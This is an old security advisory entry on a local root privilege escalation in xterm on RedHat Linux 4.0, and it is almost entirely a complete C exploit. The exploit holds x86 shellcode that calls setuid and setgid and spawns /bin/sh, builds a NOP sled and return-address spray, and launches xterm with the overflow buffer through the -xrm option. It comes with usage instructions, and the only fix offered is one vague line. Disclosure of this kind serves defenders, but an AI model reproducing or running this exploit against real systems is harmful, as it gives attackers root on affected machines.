COMMAND

    xterm

SYSTEMS AFFECTED

    Linux RedHat

PROBLEM

    Taeho Oh posted  following.  It's  xterm exploit where  local user
    can gain  root access.   It was  tested with  RedHat4.0.   Exploit
    follows:

    /*
    
	    xterm exploit code for x86 linux
    
	    Local user can gain root access.
    
	    Tested redhat linux : 4.0
    
	    Usage
	    $ xterm-ex 0
	               |
	               +------ try from -50 to 50 ( try in steps of 1 )
    
	    This program is only for demonstrative use only.
	    USE IT AT YOUR OWN RISK!
    
	    Programmed by Taeho Oh 1999/04/25
    
    
    Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
    PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <syslog.h>
    
    #define OFFSET                          100
    #define RET_POSITION                   1024
    #define RANGE                            20
    #define NOP                            0x90
    
    char shellcode[1024]=
	    "\xeb\x31"                      /* jmp 0x31             */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\xb0\x17"                      /* movb $0x17,%al       */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\xb0\x17"                      /* movb $0x17,%al       */
	    "\x04\x17"                      /* addb $0x17,%al       */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x5e"                          /* popl %esi            */
	    "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
	    "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
	    "\xb0\x0b"                      /* movb $0xb,%al        */
	    "\x89\xf3"                      /* movl %esi,%ebx       */
	    "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
	    "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\x89\xd8"                      /* movl %ebx,%eax       */
	    "\x40"                          /* inc %eax             */
	    "\xcd\x80"                      /* int $0x80            */
	    "\xe8\xca\xff\xff\xff"          /* call -0x36           */
	    "/bin/sh";                      /* .string \"/bin/sh\"  */
    
    unsigned long get_esp(void)
    {
	    __asm__("movl %esp,%eax");
    }
    
    
    void main(int argc,char **argv)
    {
	    char buff[RET_POSITION+RANGE+1],*ptr;
	    long *addr_ptr,addr;
	    unsigned long sp;
	    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
	    int i;
    
	    printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	    printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	    printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");
    
	    if(argc>1)
		    offset+=atoi(argv[1]);
    
	    sp=get_esp();
	    addr=sp-offset;
    
	    ptr=buff;
	    addr_ptr=(long*)ptr;
	    for(i=0;i<bsize;i+=4)
		    *(addr_ptr++)=addr;
    
	    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
		    buff[i]=NOP;
    
	    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
	    for(i=0;i<strlen(shellcode);i++)
		    *(ptr++)=shellcode[i];
    
	    buff[bsize-1]='\0';
    
	    execle("/usr/X11R6/bin/xterm","xterm","-xrm",buff,0);
    }

SOLUTION
    
    I thing latest version fixes this.